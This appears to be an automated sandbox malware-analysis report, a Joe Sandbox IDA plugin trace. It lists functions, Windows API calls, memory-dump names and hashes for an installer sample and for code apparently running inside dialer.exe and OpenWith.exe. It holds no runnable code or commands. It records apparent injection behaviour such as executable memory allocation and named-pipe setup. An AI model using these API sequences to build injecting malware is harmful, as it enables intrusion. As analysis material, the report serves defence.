Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003), ref: 00405E6E

Strings

C:\Users\user\Desktop, xrefs: 00405E58

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dialer.exePID: 796, Parent PID: 2104COMMON

Executed Functions

Function 027E02D4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 027E031C

Part of subcall function 027E00A0: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027E00C9
Part of subcall function 027E00A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 027E0275

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 027E036E
VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 027E03DD
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 027E03FD
MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 027E0424
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 027E044C
FindCloseChangeNotification.KERNELBASE(?), ref: 027E0467

Strings

,, xrefs: 027E034C

Memory Dump Source

Source File: 00000010.00000003.2201886726.00000000027E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_27e0000_dialer.jbxd

Similarity

API ID: Virtual$Alloc$Free$ChangeCloseFileFindNotificationProtectView
String ID: ,
API String ID: 2870039258-3772416878
Opcode ID: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
Instruction ID: 8dd0e20f6eb1abef40ea8d087d48b2479144bf1f788c2e825f74b9d97ff1d811
Opcode Fuzzy Hash: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
Instruction Fuzzy Hash: A1510CB5900209EFCF21DFA9C984ADEBBB9FF09354F108429F95AA7240D770A950CF60

Uniqueness

Uniqueness Score: -1.00%

Function 027E00A0 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027E00C9
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 027E0275

Memory Dump Source

Source File: 00000010.00000003.2201886726.00000000027E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_27e0000_dialer.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: b6e886d0e9b646b5c152cb032a9d79eca2fafa02af208f6f426155c96701f0f9
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: ED716871E0424A9FDF41CF98C981BEEBBF0AB09314F284095E566FB241C374AA91CF65

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 027E027F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000003.2201886726.00000000027E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_27e0000_dialer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction ID: d1cefcdbd14bcaa7c2b3f8a075b532ceec1bfef42e64572d179687304c614070
Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction Fuzzy Hash: C1F06275B01600CFCF14CF59C584DA677F9EB89724B654595E406AB261D3F0DD84C770

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: OpenWith.exePID: 6736, Parent PID: 2104COMMON

Execution Graph

Execution Coverage:	34.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	73.3%
Total number of Nodes:	30
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007DF4B6389AF4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156nativeCOMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4B6389B1A
NtAcceptConnectPort.NTDLL ref: 00007DF4B6389BC3
NtAcceptConnectPort.NTDLL ref: 00007DF4B6389C84
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B6389C89

Strings

, xrefs: 00007DF4B6389BB3
0, xrefs: 00007DF4B6389B66
@, xrefs: 00007DF4B6389B7C

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$??3@_malloc_dbg
String ID: $0$@
API String ID: 2460957884-2347541974
Opcode ID: 2346e1dea013211445be7b298a3f58cd395ddeb762ee424c6c2405f2dc5af54b
Instruction ID: e1c44318f3e17832c2ec60aca59400158b891d91c5c6588f45be10a89a08d6f2
Opcode Fuzzy Hash: 2346e1dea013211445be7b298a3f58cd395ddeb762ee424c6c2405f2dc5af54b
Instruction Fuzzy Hash: AE5172309287888FD764DF58D4857AA7BF0FB88314F10556EE58FC6282DB75D4858B83

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD758630C7 Relevance: 9.4, APIs: 6, Instructions: 390nativememoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 000001BD75863810
NtAcceptConnectPort.NTDLL ref: 000001BD75863957
NtAcceptConnectPort.NTDLL ref: 000001BD758639E4
NtAcceptConnectPort.NTDLL ref: 000001BD75863AA3
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001BD75863AC0
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001BD75863AD2

Memory Dump Source

Source File: 00000014.00000003.2319903154.000001BD75860000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_1bd75860000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$BoundaryDeleteDescriptor$AllocateHeap
String ID:
API String ID: 3757982343-0
Opcode ID: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
Instruction ID: 1020c3e31723ff54f8aadb68f0fc9bfc8060956a6fa0ac972d8f7a4d78862e54
Opcode Fuzzy Hash: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
Instruction Fuzzy Hash: B8C17430218B498FDB5CEF18D485BE9B7E1FB94319F80456DE48AC7256EF34E8458B82

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6389CA0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON

Download Yara Rule

APIs

_calloc_dbg.MSVCRT ref: 00007DF4B6389CC1
NtAcceptConnectPort.NTDLL ref: 00007DF4B6389D6E

Strings

0, xrefs: 00007DF4B6389D0C
@, xrefs: 00007DF4B6389D22
, xrefs: 00007DF4B6389D5E

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort_calloc_dbg
String ID: $0$@
API String ID: 3053611130-2347541974
Opcode ID: 2efbfb43f5b264e98edc7990400f44a606071b03ecf31d8e2d45c18cdd4aafd7
Instruction ID: 2f503f441b2ee44f546b1b9e8b8835a1f576dc9f3f7a70749e5fe9a8b1e17aa1
Opcode Fuzzy Hash: 2efbfb43f5b264e98edc7990400f44a606071b03ecf31d8e2d45c18cdd4aafd7
Instruction Fuzzy Hash: E5515D3060CB898FE764DF98D8947ABBBE1FB94351F00152EE58EC3291DB74E5448B42

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B6375BD8 Relevance: 6.7, APIs: 4, Instructions: 747COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4B63639D4: _malloc_dbg.MSVCRT ref: 00007DF4B63639FD

_calloc_dbg.MSVCRT ref: 00007DF4B6375E3A
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B6375EA1
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4B637638E
VirtualFree.KERNELBASE ref: 00007DF4B63763E0

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: ??3@$FreeVirtual_calloc_dbg_malloc_dbg
String ID:
API String ID: 2435629650-0
Opcode ID: aae81571bd27c63e3009cb726d59ebe1a4043ba694c735212d7732e4a1a5a2b6
Instruction ID: e0df05bc3a0190c4da87e5c8df1d65a59944068df3032b17140d130f133df0fb
Opcode Fuzzy Hash: aae81571bd27c63e3009cb726d59ebe1a4043ba694c735212d7732e4a1a5a2b6
Instruction Fuzzy Hash: DE424E30518E488FEB95EF68D884AAAB7E1FF58310F10566ED05FC7262DF34A585CB81

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD75701CD0 Relevance: 4.8, APIs: 3, Instructions: 278
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 000001BD75701E6B
NtAcceptConnectPort.NTDLL ref: 000001BD75701F6E
FindCloseChangeNotification.KERNELBASE ref: 000001BD75701F77

Memory Dump Source

Source File: 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1bd75700000_OpenWith.jbxd

Similarity

API ID: AcceptAllocateChangeCloseConnectFindHeapNotificationPort
String ID:
API String ID: 3171316915-0
Opcode ID: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
Instruction ID: b2a04c197ff7651a359068f7cc6e980bb4294aa331f296e28822ea583894608c
Opcode Fuzzy Hash: 2998f17752da19f3229414bc30af807452c20e21bc577cde4fa90f5802e493a5
Instruction Fuzzy Hash: 7E91B530508E588FDB68EB18D8817E573E1FB94319F94475AE49FC7296FB34A84287C1

Uniqueness

Uniqueness Score: -1.00%

Function 000001BD75701A90 Relevance: 4.6, APIs: 3, Instructions: 150
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 000001BD75701AD5

Part of subcall function 000001BD7570185C: GetProcessMitigationPolicy.KERNELBASE ref: 000001BD7570192F

NtAcceptConnectPort.NTDLL ref: 000001BD75701BCF
RtlAddVectoredExceptionHandler.NTDLL ref: 000001BD75701BEA

Memory Dump Source

Source File: 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001BD75700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1bd75700000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$ExceptionHandlerMitigationPolicyProcessVectored
String ID:
API String ID: 1453854198-0
Opcode ID: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
Instruction ID: 0b9bd0a337dd6bd0bbb3c7fac04940aac53c53efaae6e34d53396f06e2a8560e
Opcode Fuzzy Hash: d10bc7eecf76d0dca438e32bd9e6ca23ea1b11bfffb6ce02bc94d4770511dc9b
Instruction Fuzzy Hash: 7541D030208B888FDB58DF2898897D57BD0EB59324F44439EE85ECB2C7EB34C5058796

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B637F83C Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE ref: 00007DF4B637F8F3
BindIoCompletionCallback.KERNEL32 ref: 00007DF4B637F92A
ConnectNamedPipe.KERNELBASE ref: 00007DF4B637F93B

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID: NamedPipe$BindCallbackCompletionConnectCreate
String ID:
API String ID: 2502124517-0
Opcode ID: 9f21c1481329a0ea06529805dac4bd9f865f37b17101e2c3294277e11989e67f
Instruction ID: f73fe2f33e381f4ad72d46a45b6d4c5d5906957bfd9b1003684b8427eef43d3a
Opcode Fuzzy Hash: 9f21c1481329a0ea06529805dac4bd9f865f37b17101e2c3294277e11989e67f
Instruction Fuzzy Hash: 0B31A030608A498FE794DF68D8887AA7BE0FB98320F50563EE45BC3191DB38D945C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B638A600 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

0, xrefs: 00007DF4B638A65F

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cde0ffe81ef901ac1f3e20277e9996c873e54bf14cb1d3d6ec20e7420b01d3b2
Instruction ID: 95734534167fd6a9e7e6534c02ebad50ec18f0efe4bf44f1b6c563c45fceaaf0
Opcode Fuzzy Hash: cde0ffe81ef901ac1f3e20277e9996c873e54bf14cb1d3d6ec20e7420b01d3b2
Instruction Fuzzy Hash: DD21A731B1CA898FD760EF9C84847AA7AE0FB98321F50177FE54EC3295D67898458781

Uniqueness

Uniqueness Score: -1.00%

Function 00007DF4B638A540 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

0, xrefs: 00007DF4B638A598

Memory Dump Source

Source File: 00000014.00000003.2582113334.00007DF4B6361000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B6361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_7df4b6361000_OpenWith.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8470fbff762e3531a12c1b2b11e56c88662d32310fb2e529b80da0b8d4828605
Instruction ID: 1cb88550c2c9db825b5da78c199bb6a512707ab399970a5514963c010d1ab557
Opcode Fuzzy Hash: 8470fbff762e3531a12c1b2b11e56c88662d32310fb2e529b80da0b8d4828605
